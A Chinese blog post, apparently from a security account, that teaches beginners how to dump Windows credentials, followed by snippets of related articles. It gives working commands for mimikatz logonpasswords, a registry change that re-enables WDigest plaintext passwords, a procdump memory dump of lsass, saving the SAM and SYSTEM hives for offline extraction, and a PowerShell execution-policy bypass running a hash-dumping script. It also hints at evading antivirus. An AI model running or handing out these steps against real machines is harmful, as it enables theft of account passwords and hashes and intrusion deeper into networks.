windows获取hash常见手法

最新推荐文章于 2024-07-16 22:03:34 发布
最新推荐文章于 2024-07-16 22:03:34 发布
阅读量491 收藏 8
点赞数 9
文章标签: windows web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/milu_Sec/article/details/135397375
版权

有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!

一 猕猴桃mimikatz

实验环境 win7

适用于Windows 8.1 和 Windows Server 2012 R2 之前

privilege::debug

sekurlsa::logonpasswords

图片

实验环境 win10

Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储

可以读到hash

图片

所有我们要修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

将 UseLogonCredential 设置为 1 然后重启

Shutdown -r -t 0

再用猕猴桃就可以获取到密码了

privilege::debug
sekurlsa::logonpasswords

图片

或者 管理员打开cmd运行procdump导出dmp

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。

procdump64.exe -accepteula -ma lsass.exe 12.dmp

然后放到猕猴桃的目录

sekurlsa::minidump 12.dmp
sekurlsa::logonpasswords full

图片

二 注册表获取sam文件

从注册表导出

reg save hklm\sam e:\sam.hivereg save hklm\system e:\system.hive

其中hklm 代表 "HKEY_LOCAL_MACHINE",这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。

把这两个hive放到猕猴桃目录

lsadump::sam /sam:sam.hive /system:system.hive

图片

实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。

图片

希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。

三 powershell

用原版肯定被杀,有能力的可以做一下免杀​​​​​​​

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1powershell -exec bypass "import-module .\Get-PassHashes.ps1;Get-PassHashes"

图片

同时欢迎各位同仁关注麋鹿安全,我们的文章会第一时间发布在gong众号平台,如果不想错过我们新鲜出炉的好文,那就请我们的公众hao(同名)!

麋鹿安全
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1760
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
Windows安全加固简介
edwardhyl的专栏
06-20 2765
前言    该文是根据《Hardening Windows NT》翻译而成,其中也根据自己的一些体会及现实情况进行了一些调整。原文可以再参考文献中获得。 目前,Windows系统已经占据了绝大部分的桌面市场,同时在服务器市场也占有较大比重。长期以来,由于病毒攻击、黑客入侵等原因,给人们留下了易受攻击的不好印象。但Windows是否能够变得安全一点成为人们争论的热点,本文将就加固Windows安全进行讨论。   一、病毒防护产品 在很久以前,病毒防护产品真的是很稀有的东西,那时候计算机病毒也真的
windows系统下查询下载文件哈希值
Бездомная
05-20 3139
3、改为你要校验的文件路径。如果该文件不在当前工作目录,需要输入完整的文件路径。(对于 Powershell,文件路径中如果有空格,还需要用引号把路径括起来,并在最前面插入一个&。HashAlgorithm 可选项包括:MD2、MD4、MD5、 SHA1、SHA256、SHA384、SHA512 (注意必须是大写)2、输入Powershell命令,启动Powershell命令窗口。例如,要效验的文件在F盘 ,则cd f:。跟文件给的sha256对比一下看文件是否完整。输入下面命令按回车键。
Windows直接获取文件的hash
weixin_43903105的博客
05-19 1390
直接输入一下命令: certutil -hashfile F:\code\1.jpg
使用Windows命令获取文件的hash码校验文件
最新发布
Qi_kernelpanic的博客
07-16 633
很多网站在提供资源下载时也会提供相应的hash码,是为了防止用户下载到不完整或者被篡改的文件。用户应该在下载后及时的验证文件的hash,来保证下载资源的安全性和完整性。利用Windows命令可以快速的完成这项任务。
windows 10自带命令查看文件的哈希值
u013930899的博客
08-30 2847
【代码】windows 10自带命令查看文件的哈希值。
查询文件hash
qq_37358909的博客
01-24 1769
一个文件复制后改名,查询hash值对比,hash值一样。
windowshash抓取的几种方式
逗比大师的博客
08-04 370
前提:在渗透测试过程中,对于windows系统的机器渗透需要注意hash获取,其中hash分为LM-HASH与NTLM-HASH,在windows系统中,hash的默认存储位置为:C:\Windows\System32\config\SAM 各种工具: mimikatz privilege::debug sekurlsa::logonPasswords wce wce.ex...
离线提取目标机hash(第五十六课).docx
09-15
其中,离线提取目标机哈希值(hash)是一种重要的攻击手法,它可以在不引起即时警觉的情况下获取系统凭据,进而实施更深层次的渗透测试或攻击活动。本文将详细介绍一种无需上传工具如mimikatz,仅通过现有资源完成离线...
渗透测试之攻击Windows认证
Blood_Pupil的博客
08-31 542
用户凭证收集 Hash NTLM + Kerbose PTH + compmgmt.msc
红蓝对抗之Windows内网渗透
Tencent_SRC的博客
06-29 6264
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进...
windows cmdline 查看 hash/md5/sha1/sha256的方法
知识空间
04-01 1300
windows 查看 hash/md5/sha1/sha256的方法 certutil -hashfile 文件 [md5|sha1|sha256]
多种姿势抓取windows系统的hash
p_utao的博客
09-12 5093
hashdump抓取密码 从目标机中提取hash值,破解hash值就可获得账号密码,计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要访问就必须有系统级账号,所以要使用该命令就必须进行权限提升 在shell提示符下输入hashdump命令,将导出目标机sam数据库中的hash meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b5140
windows hash简介
qq_52712762的博客
06-04 1208
1、Windows系统使用两种方法对用户的密码进行哈希处理。它们分别是LAN Manager(LM)哈希和NT LAN Manager(NTLM)哈希2、所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串3、现在已经有了更新的NTLMV2以及Kerberos验证体系4、Windows加密过的密码口令;我们称之为hashwindows的系统密码hash默认情况下一般由两部。
windows获取hash常见手法,你知道吗?
logic1001的博客
03-22 1486
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获取到密码了。
Windows、Linux 系统下查看文件hash、md5、sha
qq_25775675的博客
07-16 1926
Windows、Linux系统下查看文件hash、md5、sha。
Windows获取密码及hash
LuckySec
05-04 3472
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
Windows系统中使用CMD命令计算文件的Hash
热门推荐
07-04 1万+
使用certutil命令即可,例如: certutil -hashfile D:\1.exe MD5 certutil -hashfile D:\1.exe SHA1 certutil -hashfile D:\1.exe SHA256 其中,"D:\1.exe"是文件名,MD5/SHA1/SHA256是不同的Hash算法。 ...
windows怎么获取hash
05-24
Windows 操作系统中,可以通过 PowerShell 命令来获取文件的哈希值。请按照以下步骤操作: 1. 打开 PowerShell 命令行界面,可以通过在开始菜单中搜索“PowerShell”来找到它。 2. 在 PowerShell 命令行中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值